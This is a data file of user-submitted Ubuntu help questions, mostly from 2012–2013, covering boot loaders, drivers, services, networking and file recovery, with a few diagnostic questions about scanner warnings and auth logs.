254562	where to install grub with two distros on same hard drive ?	i have windows installed on one ssd . the sata cable is currently unplugged because i 'm about to install two linux distros on another ssd , those being linux mint 14 and backtrack 5 . now , i used gparted to create the following partitions on the sda ssd : sda1 with ext4 file system for linux mint sda2 with swap for linux mint sda3 with ext4 file system for backtrack 5 sda4 with swap for backtrack 5 sda5 with ext4 file system for /home ( to share file among distros ) now , i 'm in the process of installing linux mint . it 's asking me where i want to install grub . ideally , i want to switch my bios to boot from the hard drive where my linux distros are on , because i 've read that grub will see windows and add it to its menu . this seems to be the easiest method of triple booting ( 2 linux , 1 windows ) . however , do i install grub on the sda hard drive ? i placed a boot flag on the sda1 partition , so should i install it there instead ? sda hard drive ? sda1 partition ?
254565	starting desktopcouch or couchdb on lubuntu 12.10	i have installed desktopcouch on my lubuntu 12.10 using apt-get sudo apt-get install desktopcouch installation was ok , but when i try to start it with command couchdb , i get the following error : { `` init terminating in do_boot '' , { { badmatch , { error , { bad_return , { { couch_app , start , [ normal , [ `` /etc/couchdb/default.ini '' , '' /etc/couchdb/local.ini '' ] ] } , { 'exit ' , { { badmatch , { error , { error , enoent } } } , [ { couch_server_sup , start_server,1 , [ { file , '' couch_server_sup.erl '' } , { line,56 } ] } , { application_master , start_it_old,4 , [ { file , '' application_master.erl '' } , { line,274 } ] } ] } } } } } } , [ { couch , start,0 [ { file , '' couch.erl '' } , { line,18 } ] } , { init , start_it,1 , [ ] } , { init , start_em,1 , [ ] } ] } } crash dump was written to : erl_crash.dump init terminating in do_boot ( ) line-breaks added to the json for better readability i have checked file /etc/couchdb/default.ini and i have created folder for data mentioned there ( it was /var/lib/couchdb/1.2.0/ ) and assigned the 777 access rights to it . but it does n't help . i also tried sudo couchdb , but the result is the same . file , mentioned in the error ( erl_crash.dump ) has 16k lines , makes no sense to me i checked and another couchdb is not running : $ couchdb -s apache couchdb is not running . running out of ideas ... do you know what the problem might be ?
254566	annoying autorenaming in guake	i love guake drop-down terminal , but it has an annoying issue . when i use many tabs , i hate when the tab names rename each time i execute a command or navigate in one of them . i want to rename any tab and maintain the name in all sessions . for instance , when i use midnight commander and i enter in a long path folder , the tab expands and its horrible . i see tab name mc [ user @ machine_name ] : /weird/long/infinite/path when i navigate to /weird/long/infinite/path folder . can i have always the same name for each tab , even when renaming it manually ?
254568	how to access the ntfs partition where i 've installed boot-loader of ubuntu 9.04 ?	i have two hdds > > hd0 is internal , hd1 is external . i installed ubuntu 9.04 in the external hdd as follows : '' \home '' ext3-partition in ( hd1,2 ) '' \root '' ext3-partition in ( hd1,3 ) '' swap '' partition in ( hd1,4 ) during installation , i changed the bootloader setting . ( i intended ubuntu 9.04 to boot from the external hard disk itself . ) i set the ( hd1,0 ) ntfs partition for installing the boot-loader . [ i thought the bootloader will be installed in that ntfs partition & its data will remain intact . now ( hd1,0 ) is a partition of 800gb ( ! ! ! ) & it contains ~560gb of my data which i 'm unable to access from windows/ newly installed ubuntu 9.04/ ubuntu 8.10 live-disk ... windows is unable to read the data ( as expected : d ) ; windows wants to format the disk before using ! ! ! unexpectedly , ubuntu does n't even show the 800-gb space in `` places/computer '' although it shows the partition as of `` unknown file system '' in `` gparted '' ( partition editor ) . i need the data ( ~560gb ) ... pl help ...
254577	how to set up a chjail enviroment	i 've been searching throughout the web for instructions on creating a chjail '' ed '' user or terminal instance , but so far i could find none that would suit my preferences . all i need is a terminal instance for a user to log in , and then restrict his activity to his section of the hard drive only . and is there a shell that 's already precompiled to do so ? the protocol would be ssh if you need additional information . i also do n't want any scripts like while [ true ] ; do printf `` $ '' ; read command $ command since the user could skip the initializing of that script .
254580	$ path prolems in ubuntu	i have an application named delphi in delphi_dp directory . its path is /usr/kalyan/downloads/delphi_dp i have done export path= $ path : /usr/kalyan/downloads/delphi_dp echo 'export path= $ path : /usr/kalyan/downloads/delphi_dp ' > > ~/.bash_profile but in terminal , when i type delphi , it is showing command not found . please help..
254581	how to save my data in external disk	my hard drive is not mounting and i am not able to access any file . it gives the following error message . error mounting : mount exited with exit code 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent
254583	unable to run wubi on xp	i am trying to run wubi on windows xp professional 5.1 ( build 2600.xpsp_sp3_gdr.120821-1629 : sp 3 ) i have administrator rights i downloaded wubi from here i have installed python 3.2 and my path is set as c : \program files\miktex 2.5\miktex\bin ; % systemroot % \system32 ; % systemroot % ; % systemroot % \system32\wbem ; c : \program files\perl\bin\ ; c : \program files\hummingbird\connectivity\8.00\accessories\ ; c : \program files\hummingbird\connectivity\8.00\nfsclient ; c : \program files\subversion\bin ; c : \mingw\bin ; c : \palmoscygwin\bin ; c : \windows\system32\windowspowershell\v1.0 when i run wubi.exe i get the windows security warning , when i ask to run , there is a pause , a beep and nothing else happens .
254587	bash script to open up a terminal and cd into a directory	i 'm trying to write a simple bash script , which when run from the command line , will cd into a default directory and then open up the folder in the file-browser : # ! /bin/bash if [ -z `` $ 1 '' ] then # unless $ 1 is specified , cd into main proj cd code/ruby/my-main-proj else # cd into project specified by $ 1 cd code/ruby/ $ 1 fi # open folder in file manager pcmanfm . this is great , it gives me two things : a command-prompt whose working directory is set to the project i want a file-browser for the same project the trouble is that i would like to run my bash script by clicking on a desktop icon but in it 's current form , the terminal does not open up , just the file browser.. so i 've made a modification to try and get the terminal to open too : then # unless $ 1 is specified , cd into main proj x-terminal-emulator -e `` cd code/ruby/my-main-proj '' else # code same as before but while the terminal does open , it just displays a blank screen , with no prompt or pwd . how can i get a terminal to open up , and have it 's working directory change to the one i 'm trying to specify in my bash script ?
254589	automatic brightness settings and video card driver	hello , i just installed ubuntu 12.04 lts x64 , i realy need help with automatic brightness settings driver how to ? and second is : no nvidia driver ( additional driver ) found , if i install the recommended driver , my brightness will be 100 % after rebooting with no way to change to other low percentage . the machine is : sony vaio vpc f11 m1 e-h cpu intel i5 2.40-2.93 , nvidia gt 330m cuda 1gb , 8gb ddr3 please help i really want to migrate to ubuntu linux but these things are taking me back to wine . thanks
254591	copy files from one home directory to another	i 've upgraded my laptop with a new ssd and installed ubuntu 64bit version on it . on the old hard drive , several operating systems are installed among others my old ubuntu 32bit installation . now i want to move files and folders between this two home-directories , while i 'm logged into the new ubuntu installation . how can i do this ? thanks in advance . danny edit : i forgot to mention that the home directories are encrypted .
254600	why is my `` other software '' tab in software sources blank ?	i ca n't install apps or software on ubuntu 12.04lts . the other software tab in my software sources is empty . what should i do ?
254601	plans to automatically support existing gpt partitions during installation ?	i have a desktop with a 2tb hd ( used for data ) and a 120gb ssd currently used for windows . the drives use gpt partition tables . i wanted to install ubuntu side by side with windows but had a lot of trouble getting grub to handle this setup and i finally gave up . my question : are there plans for the ubuntu installer to automatically handle [ existing ] gpt partition tables ? i see a lot of people with similar problems to me , and as drives increase in size , this seems very necessary ... thanks /max
254602	dual monitor with ati radeon hd 3870	i have got 12.04 on my desktop machine . i have also two dell monitors 24 '' and 22 '' . my graphics card is `` 04:00.0 vga compatible controller : ati technologies inc r680 [ radeon hd 3870 x2 ] '' . i have searched and tried proposed solutions here and none work . i also tried xrandr but it behaves strangely . with xrandr , i can not get the resolution right and the fluxbox bottom bar is in the extended monitor ( 22 '' ) . is there an easy way to get the extended desktop working correctly with radeon hd 3870 ?
254606	gnome display manager fails to load on startup	i have installed gnome on my ubuntu 12.10 . when i installed it , it initially worked fine for first two times but after that whenever i boot , it fails to start the display manager . the screen turns completely black . on pressing esc it gives a log of services being started . its mentioned there starting gnome display manager [ fail ] then i use tty1 and start gdm manually by sudo gdm i have re-installed gdm various times but its not helping . i will be glad to provide any other information that is required .
254611	update-grub does n't detects my xp instalation	i installed windows xp , and i was missing grub . booted to ubuntu with a grub recovery disc . ( i does n't know it 's name ) then , i ran sudo update-grub and this is the output : sebastian @ sebastian-desktop : ~ $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.38-16-generic-pae found initrd image : /boot/initrd.img-2.6.38-16-generic-pae found memtest86+ image : /boot/memtest86+.bin found windows vista ( loader ) on /dev/sda1 done sebastian @ sebastian-desktop : ~ $ where is my windows xp ? i 'm using ubuntu 12.04 precise pangolin and grub 1.99
254613	cpu undervolting gui software ?	i have lenovo b580 laptop with core i3 . i 've followed tutorial to install phc kernel and then phc software to undervolt but this soft is too complicated . is there any other program whitch is able to change voltages for all cores at the same time ? or just let me know of any other oc program for ubuntu . thanks !
254616	how to install two ubuntus ?	i have edubuntu and i have installed ubuntu64 . but only edubuntu is booting . how to make grub understand that there are 2 ubuntus .
254622	what will i get less/different when installing ubuntu on virtualbox ?	could someone tell me , what i do n't get or get less when installing ubuntu 12.04lts on virtualbox ?
254623	running deja-dup as cronjob , bu disc not connected	i have a problem with my backup cronjob . i use these settings ( as proposed in that post ) : 15 * * * * env display=:0 /usr/bin/deja-dup -- backup during runtime deja-dup says : backup location not available . waiting for 'xy ' to become connected ... the external disk 'xy ' is mounted ; i can also create a backup when i run deja-dup -- backup in the command line . any ideas what the problem could be ? could it be a permission issue ? but crontab runs the job with my user i suppose . thanks
254634	apt-get install segfault	when i tried to apt-get install pkg_name then i got this reading package lists ... done segmentation faulty tree ... 50 % and this appears in the /var/log/syslog file feb 13 15:22:19 hostname kernel : [ 186840.528580 ] apt-get [ 17406 ] : segfault at 7fc3ec5c9631 ip 00007fc3b622a297 sp 00007fff58009210 error 4 in libapt-pkg-libc6.10-6.so.4.8.0 [ 7fc3b618b000+c5000 ] can anyone help please
254635	redirecting /dev/null to some other device	is it possible to redirect , ie create /dev/null as non-null device , like /dev/console or /dev/stdout ? this obviously has to be done before init runs create creates a standard /dev/null . upstart seems to dislike simple symlink to /dev/stdout .
254638	how to remove caching of nfs shares on local disk	my desktop do n't have an internal hard drive . i installed ubuntu in a crappy old portable hard disk which is very slow . i mounted the home folder of my laptop to the desktop using nfs . my desktop and my laptop are directly connected using a gigabit connection . if i am correct any kind of caching on my local disk in desktop will only slow down the access . so how can i make sure that none of the data from the nfs share is cached to my local drive .
254639	is there a way to echo an alias ?	i have set some aliases in my .bashrc file and for some reason one of them does not behave as expected . since i do n't remember the exact command assigned to that alias , i would like to see the command to find out what 's wrong . except the obvious opening the .bashrc file to see it , is there a command that just echos the command assigned to that alias ?
254643	ho to install an already downloaded .crx file extension in chrome ?	it download the .crx file from novell-moonlight-3.99.0.3-x86_64.crx and then went to chrome : //extensions/ and drag and drop the file on the chrome windows opened in that address and the following message appear apps , extensions , and users scripts can not be added from this website with an `` ok '' button and nothing more . i read something about `` extensioninstallsources '' , but not know how configure it to install extensions from a local directory . any idea ? i 'm on ubuntu 12.04 64bit
254646	can i completely erase a usb and ssd hard drive in ubuntu 12.04 ?	here 's my story.. i got 3 ssd drives to test out some open source operating systems.. since ubuntu accepted my onboard raid 0 , i used the 2 ssd 's with ubuntu last to store data on , but first i installed bsd a couple times on them . i ended up having to find a freeware thing online which saved the two ssd 's and i was able to run those two with my system now . however , i have one ssd left and i want to try booting from usbs as well , but i seem to run into the same problem with both the ssd 's and usbs : no matter what i do ubuntu keeps wanting to save something on those drives , call it `` lost and found '' ( locked so i ca n't see what 's in it ) , and that seems to be what 's holding up my disks from being able to competely erase a hard drive with nothing nothing on it ! ! ! ! ! ! ! ! ! ! ! nothing ! ! ! ! ! ! ! ! just a fresh ssd and usb to reload the operating systems.. both the ssd 's and usb seem have the same problem finding a way to boot.. tand formatting but that does n't dand the two ssd 's that work ca n't not work without loading into the grub screen ( which i timed out to 0 seconds but it still shows up for a second ) .. thus far , i 've tried gparted , disk utility , shred.. and some program online that was able to fix my solid state drives to load ubuntu on them , but i lost that.. i just want a bootable drive with no grub whatsoever ! ! ! ! ! ! just one whole disk with no leftovers ! ! ! that 's it ( why ca n't it be this easy ? ) . i 'm not worried about security or secure delete , i just want bootable disks , that 's all.. how do i do this ? i understand formatting but that does n't do the trick either for whatever reason , shredding , deleting partitions and reformatting does n't actually erase everything.. i wan na know how to do this cause it seems you should be able to do this more easily..
254647	ubuntu installation in virtualbox - not using base memory in ram	i am installing ubuntu right now under virtualbox in windows 7 . it is going extremely slow and virtualbox is only using about 128 mb of ram out of the 1024 mb i set as base memory to it . is it supposed to do this ? it might be an off topic question but i try asking here .
254653	make laptop files accessible to android device over laptop wifi antenna ?	i would like to be able to access the files on my ubuntu laptop from my android phone and tablet . ideally , i would want to do this over my own secure wlan and then over sftp or samba shares . since there is no wlan that is accessible to me where i want to do this , i want to create that wlan network with the laptop 's built in wifi or a wifi usb stick . this wlan should be accessible by ordinary android devices . here is the problem : when choose `` create new wireless network '' in the network manager applet , the network created is not available in any of my mobile devices . i am told this is because it is an `` ad hoc '' network which is not supported by these devices . there are some instructions on how to create managed networks ( not sure if this is the correct term ) but those look very complex and often differ among each other . also , all of these instructions are for making the internet connection of the laptop available over wifi - which i do not need . all i need is for the wifi network to make the notebook files available , so the only host that needs to be accessible over this wlan is the notebook . is there a ( hopefully ) easy way to just start such a wlan network ? if not , would it be possible to achieve what i want with some other kind of hardware ( other than a simple usb wifi stick ) , so i can create a wlan where my laptop is the only accessible host ? i think with the increasing number of mobile devices , and with both the mobile phones/tables and the laptop having their wlan hardware built right in , it is odd that there is no easy way to connect them directly and without the necessity that both devices have access to some other wlan . edit : i think this may be not , as suggested a duplicate , since the answer to the other question , as well as many other often slightly different recipes , try to share the internet connection of the computer that provides the access point , while i just want to access files on this computer or use services there , simply using the ip address . so what i was looking for is the easiest way to achieve this . i think i may have found a solution in the meantime which is less complex as the answer for the suggested duplicate , but i can not seem to create an answer here .
254658	how heavy is mate desktop environment ?	considering the same reasons as in this previous question on cinnamon , it would be interesting to know where does mate de stands in this context - between unity and kde on the one hand , and xfce and lxde on the other . so , to clearify : on a laptop with 1gb of ram there 's a sensible yet tolerable difference between lxde and xfce : between these and gnome and especially kde and unity , the difference is decisive . i use in parallel xfce and lxde , and wander whether there 's another usable de for me on this computer : all are `` usable '' of course , but compared to lxde/xfce not all are acceptable . this questions stands being closed : i guess you should close the other one too then . as reediting was suggested in comment : to put it as non-subjectively as i can : is mate heavier on resources than xfce ? is it lighter than kde ?
254666	how to know if chrome moonlight plugin is working fine ?	i just install it as described here and go to here and even the plugin asked my permission to be executed and seem to be loaded , i do n't think that is working fine cos nothing happens after the progress funny animation , what lead me to the question ... chrome moonlight plugin ?
254675	failed to run android sdk manager	i have installed android sdk in my eclipse ee ide . now i 'm trying to open the android sdk manager but getting error as even i tried to see the android console as shown in image , no error shows in console . [ is logcat console for android ? i searched error for as android console ] . thank you
254678	force ubuntu to only download updates form canonical.com mirrors	how do i force a ubuntu machine to only download updates from official canonical.com mirrors ? right now it sometimes downloads from non canonical mirrors , which get flagged in our network monitoring software . ( note : we do n't have any third party repositories on this machine )
254681	how can i tell upstart to restart a service when a different service is restarted ?	i 've an openerp server running on one of my servers . it 's started by a traditional /etc/init.d/ script . it uses a postgresql database and needs a manual restart every time postgresql is restarted . every time ubuntu releases a security update for postgresql , my openerp server becomes non-functional until i ssh to the server and manually run sudo /etc/init.d/my-openerp restart . i usually forget to do that after i do the sudo apt-get upgrade . can i configure upstart to do that for me , every time postgresql is restarted by apt ?
254682	how to change ownership of hiddenfiles	i 've had to move from one user to another , i have found online how to move all files ( including hidden ) from the old user to the new and change the ownership of those files . however how can i change the ownership of all hidden folders & files which i moved across to my new home dictionary in one simple command .
254683	some icons in launcher do not open application , blink instead	the gtk vnc viewer , skype are some icons that the launcher does not start . instead , they just blink for few seconds . how to fix this ? thank you .
254686	ubuntu one : why do i get an account status error ?	my ubuntu one account has displayed the following for several days now : we are sorry , but while our system updates your account , you can not see details of or make changes to your subscriptions . this can take up to two hours to complete , but in the meantime you can use your new services .
254687	using apache2 proxy_html module on ubuntu 12.04	i am trying to set up a reverse proxy to give access to several internal web servers from the internet . i have configured some name based virtual hosts with reverse proxy ( i enabled proxy and proxy_http modules ) . so far so good ... one of the servers happen to be a wordpress site . wordpress will generate html pages containing its internal url ( for css , etc ... ) . so i am trying to use the proxy_html module to rewrite those urls on the reverse proxy . but i fail miserably . most of the documentation on the internet refer to the latest version of the module , but 12.04 ships with version 3.0.1 , and i ca n't figure out how to make it work . here is what i have put in my virtual host conffile : < virtualhost *:80 > proxypreservehost on proxyrequests off servername example.com serveralias www.example.com proxypass / http : //192.168.1.12/ proxypassreverse / http : //192.168.1.12/ proxyhtmlurlmap http : //192.168.1.12 http : //www.example.com # setouputfilter inflate ; proxy-html ; deflate < /virtualhost > i expect any url containing http : //192.168.1.12 produced by wordpress on server 192.168.1.12 to be translated into http : //www.example.com . this does not happen . i have tried to add other directives , but all failed : proxyhtmlenable on fails . it seems to be too new and not supported by this version of the module . setouputfilter inflate ; proxy-html ; deflate fails also . maybe i am missing a module to do that ? i have tried adding a2enmod filter , but it does not work either ... well , can someone enlighten me on that ? edit noticed the mistyping in setouputfilter ? a t is missing ... so setoutputfilter proxy-html is the way to go to get proxy_html working on 12.04 . but i 'll rather go for the other solution : tell wordpress to behave according to its public name and generate right urls from the beginning .
254688	i want to install 12.10 clean but retain home from 12.04 . do i need to create separate home partition ?	i have had major issues with upgrade to 12.10 and have reverted to 12.04 . i want to install clean this time around , but would like to retain home . do i need to move home to a separate partition first ? i have an encrypted home , do i need to worry about this and make any special accommodations ? is the tutorial : ubuntureinstallation on help.ubuntu.com still relevant for 12.10 ?
254693	how to connect two ubuntu pcs to local network ( without windows pcs ) ?	how can i connect two ubuntu pcs to local network using wi-fi or direct ethernet cable connect for files transmission ? i do n't have windows , so i do n't want to install samba .
254694	how can i check the checksum of an installed deb package against the same package in the repository ?	suppose someone got root access to my machine and replaced some files , e.g . warning : the command '/bin/which ' has been replaced by a script : /bin/which : posix shell script text executable warning : the command '/usr/sbin/adduser ' has been replaced by a script : /usr/sbin/adduser : a /usr/bin/perl script text executable warning : the command '/usr/bin/ldd ' has been replaced by a script : /usr/bin/ldd : bourne-again shell script text executable warning : the file properties have changed : file : /usr/bin/lynx current hash : 95e81c36428c9d955e8915a7b551b1ffed2c3f28 stored hash : a46af7e4154a96d926a0f32790181eabf02c60a4 warning : the file properties have changed : file : /usr/bin/perl current hash : 9421cf93b65a5f19bcd488701829b467ebdee94e stored hash : cf8654ebebf4090950b2d08a48e793f5971dbbe0 current inode : 1187480 stored inode : 1272435 current file modification time : 1353976294 ( 27-nov-2012 04:31:34 ) stored file modification time : 1303497765 ( 22-apr-2011 22:42:45 ) warning : the file properties have changed : file : /usr/bin/rpm current hash : 9b04ded7ba468b19f06d4d0e37be0e6845a4800a stored hash : 0480bbd95f7f2f674476c431002fbe276a3fe160 current inode : 1237990 stored inode : 1241342 current file modification time : 1358445795 ( 17-jan-2013 22:03:15 ) stored file modification time : 1261508004 ( 22-dec-2009 21:53:24 ) warning : the command '/usr/bin/lwp-request ' has been replaced by a script : /usr/bin/lwp-request : a /usr/bin/perl -w script text executable warning : the file properties have changed : file : /usr/bin/lynx.cur current hash : 95e81c36428c9d955e8915a7b551b1ffed2c3f28 stored hash : a46af7e4154a96d926a0f32790181eabf02c60a4 current inode : 1188390 stored inode : 1239733 current file modification time : 1353340520 ( 19-nov-2012 19:55:20 ) stored file modification time : 1262672629 ( 05-jan-2010 09:23:49 ) debsums shows all ok , but what if installed packages checksums were upated along the files ? can i verify local checksums to ones in repositories ?
254695	domain name problem with vps	i want to host a website on a vps . i have everything working except for domain name resolution . the vps has no control panel . it just has a cli . i did go to my domain registrar which provides dns service and i added the following a mysite.com the.server.ip.address.here do i have to do something on the server side ?
254699	did these log entries record an intrusion to the server ?	here are log entries i found in auth.log . what does + ? ? ? mean ? and was there an unauthorized access ? feb 11 07:48:32 tts-server su [ 31265 ] : successful su for www-data by root feb 11 07:48:32 tts-server su [ 31265 ] : + ? ? ? root : www-data feb 11 07:48:32 tts-server su [ 31265 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 11 07:48:32 tts-server su [ 31265 ] : pam_unix ( su : session ) : session closed for user www-data feb 11 07:48:32 tts-server su [ 31275 ] : successful su for www-data by root feb 11 07:48:32 tts-server su [ 31275 ] : + ? ? ? root : www-data feb 11 07:48:32 tts-server su [ 31275 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 11 07:48:32 tts-server su [ 31275 ] : pam_unix ( su : session ) : session closed for user www-data feb 12 09:46:27 tts-server su [ 11208 ] : successful su for www-data by root feb 12 09:46:27 tts-server su [ 11208 ] : + ? ? ? root : www-data feb 12 09:46:27 tts-server su [ 11208 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 12 09:46:27 tts-server su [ 11208 ] : pam_unix ( su : session ) : session closed for user www-data feb 12 09:46:27 tts-server su [ 11222 ] : successful su for www-data by root feb 12 09:46:27 tts-server su [ 11222 ] : + ? ? ? root : www-data feb 12 09:46:27 tts-server su [ 11222 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 12 09:46:27 tts-server su [ 11222 ] : pam_unix ( su : session ) : session closed for user www-data feb 13 12:25:41 tts-server su [ 22032 ] : successful su for www-data by root feb 13 12:25:41 tts-server su [ 22032 ] : + ? ? ? root : www-data feb 13 12:25:41 tts-server su [ 22032 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 13 12:25:41 tts-server su [ 22032 ] : pam_unix ( su : session ) : session closed for user www-data feb 13 12:25:41 tts-server su [ 22043 ] : successful su for www-data by root feb 13 12:25:41 tts-server su [ 22043 ] : + ? ? ? root : www-data feb 13 12:25:41 tts-server su [ 22043 ] : pam_unix ( su : session ) : session opened for user www-data by ( uid=0 ) feb 13 12:25:41 tts-server su [ 22043 ] : pam_unix ( su : session ) : session closed for user www-data
254710	password pxe install	i tried to install ubuntu server using pxe . during the installation the system never ask me for a password or a login but at the end of the installation when the computer restart he asked me for a login and a password but i do n't what are the password and the login : -/ . i 'm working with maas and cobbler .
254711	kubuntu 12.10 can not be installed alongside windows 7	i would like to install kubuntu alongside windows 7 , but installer does not see my previous installation . i have extra 25 gb disk space free unallocated for kubuntu . i installed boot-repair while using livecd and here is its output : http : //paste.ubuntu.com/1644214/ i tried ubuntu installation and it saw windows 7 . i do not have uefi enabled . thanks .
254712	slow boot due to multiple `` [ sdb ] test wp failed , assume write enabled ''	my laptop boots slowly . when i dmesg , i see relatively large gaps in [ sdb ] test wp failed , assume write enabled which occured multiple times ... upto 18 times . the large gaps occur at the end of the log -- from line 773 to line 840 . how should i correct this ? the log of the major time gaps : [ 53.736667 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 53.738782 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 53.738790 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 105.451314 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 105.457428 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 105.457441 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 157.161567 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 157.163680 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 157.163692 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 208.874447 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 208.879553 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 208.879561 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 260.583954 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 260.586106 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 260.586115 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 310.762912 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 310.765037 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 310.765049 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 362.474408 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 362.476550 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 362.476557 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 414.183714 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 414.185953 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 414.185962 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 465.899631 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 465.901740 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 465.901751 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 517.608075 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 517.610399 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 517.610409 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 569.324913 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 569.327129 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 569.327137 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 621.034915 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 621.037042 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 621.037053 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 672.746849 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 672.748936 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 672.748948 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 724.459838 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 724.461952 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 724.461962 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 776.171625 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 776.178816 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 776.178829 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 827.882747 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 827.885001 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 827.885013 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 879.595336 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 879.597520 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 879.597531 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 931.308110 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 931.310316 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 931.310329 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 983.020231 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 983.022431 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 983.022441 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 1034.730703 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 1034.733599 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 1034.733611 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 1059.368276 ] cfg80211 : found new beacon on frequency : 2484 mhz ( ch 14 ) on phy0 [ 1086.443035 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 1086.445245 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 1086.445257 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 1138.154555 ] sd 4:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 1138.156801 ] sd 4:0:0:0 : [ sdb ] asking for cache data failed [ 1138.156808 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through i am using ubuntu 12.04 .
254715	rhythmbox only plays downloaded music when the archive manager is open	ubuntu 12.04 . i have downloaded some music ( they 're in a zip format , by the way ) , and they play fine , and the notifyosd comes up , as usual . but when i play the music , the archive manager has to stay open , because when i quit the manager , the music just stops , and the music disappears from rhythmbox altogether . how do i stop this ? any help appreciated . thanks .
254719	brightness control stuck on acer aspire one	after doing a pretty exhaustive search and trying every possible solution i 've found on this lovely forum ( no joke ) , my screen brightness is stuck on max . i 'm running ubuntu 12.04 . seems to be a common problem , but it 's a little frustrating that nothing seems to work . going into system settings , it appears to be set on minimum ( yet it hurts my eyes even in a brightly-lit room ) , and sliding it back and forth does n't change anything . alternatively , is there any software that will dim the brightness to a more tolerable level , in case i continue to run into brick walls ? thanks !
254722	.xsession ignored , ubuntu 12.10	i started using uxterm instead of gnome 's terminal today . i put settings for uxterm in ~/.xdefaults . but because ubuntu 's configuration ignores my .xsession file , i ca n't have these settings loaded at login . how can i get unity ( or lightdm ) to run .xsession ? my .xsession is recognized and run by xmonad .
254724	firefox constantly crashes no log	i have ubuntu 12.10 and it most of times crashes . i 've disabled all plugins , resetted firefox , started in safe-mode , but still crashes . it even crashes in safe-mode after firefox reset . i also did firefox purge via apt-get and re-installed it after cleaning apt-cache ( re-download ) , still crashes ... sometimes crashes becomes constant , i mean , it crashes right after i click on firefox icon , then i press quit , re-click on firefox icon only , crash ! , re-click crash ! etc . i checked /var/log/syslog and dmesg , ca n't find anything related to firefox or mozilla . please advice .
254730	not receiving emails from blocked e-commerce sites	ubuntu blocks two of my e-mail sites that have to do with building a computer . i guess that means i 'll be stuck with secure boot or another distro . these are not porn sites they are newegg.com and tomshardware.com . and i ca n't even ask why gwibber does n't work .
